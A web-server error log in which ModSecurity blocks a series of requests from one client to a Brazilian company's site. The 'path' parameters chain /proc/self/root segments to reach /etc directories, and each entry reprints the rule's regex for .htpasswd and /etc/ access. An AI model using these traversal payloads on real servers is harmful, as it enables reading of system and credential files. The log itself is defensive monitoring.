[Tue Mar 17 09:02:19.074493 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.243.203:57920] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCy6BJNF7axNlVR0X5PAAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:20.367082 2026] [:error] [pid 11293:tid 140411548894976] [client 74.7.243.203:33516] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCzNCmCSWTlPouqorHPAAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:21.870575 2026] [:error] [pid 2305:tid 140411708356352] [client 74.7.243.203:33530] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCzQQohV2v-7oj5HH2-QAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:23.354143 2026] [:error] [pid 1961:tid 140411683178240] [client 74.7.243.203:33536] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablCz3RXaaWotPICgYshYAAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:25.634660 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.243.203:33550] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC0dCmCSWTlPouqorHQgAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:26.944660 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.243.203:33564] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC0qBJNF7axNlVR0X5PwAAAAw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:30.753181 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.243.203:33580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC1qBJNF7axNlVR0X5QwAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:33.107389 2026] [:error] [pid 7000:tid 140411548894976] [client 74.7.243.203:57260] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC2RePVOt35XCGZP8r9QAAA5c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:34.427204 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.243.203:57270] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC2geiSKl8TjouI-b-QQAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:35.739540 2026] [:error] [pid 1961:tid 140411649607424] [client 74.7.243.203:57284] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC23RXaaWotPICgYshZQAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:37.981237 2026] [:error] [pid 2325:tid 140411616036608] [client 74.7.243.203:57286] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC3e82sZHvlq4xgHq_bgAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:39.326455 2026] [:error] [pid 1961:tid 140411725141760] [client 74.7.243.203:57288] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC33RXaaWotPICgYshaAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:41.699587 2026] [:error] [pid 2305:tid 140411582465792] [client 74.7.243.203:40818] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC4QQohV2v-7oj5HH3EgAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:43.009396 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.243.203:40828] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC49CmCSWTlPouqorHRgAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:48.755151 2026] [:error] [pid 1210:tid 140411725141760] [client 74.7.243.203:40842] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC6FKJy4A1bGlmj9BR8QAAAkI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:50.022482 2026] [:error] [pid 2473:tid 140411557287680] [client 74.7.243.203:40850] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC6qBJNF7axNlVR0X5RgAAABY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:53.512890 2026] [:error] [pid 1016:tid 140411574073088] [client 74.7.243.203:43316] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC7ZqmL8PQht4WJFlDMwAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:54.786357 2026] [:error] [pid 1961:tid 140411599251200] [client 74.7.243.203:43320] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC7nRXaaWotPICgYshbwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:56.975668 2026] [:error] [pid 2325:tid 140411683178240] [client 74.7.243.203:43334] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC8O82sZHvlq4xgHq_dQAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:58.259967 2026] [:error] [pid 1016:tid 140411741927168] [client 74.7.243.203:43336] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC8pqmL8PQht4WJFlDNQAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:02:59.415114 2026] [:error] [pid 2325:tid 140411582465792] [client 74.7.243.203:43340] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablC8-82sZHvlq4xgHq_dgAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
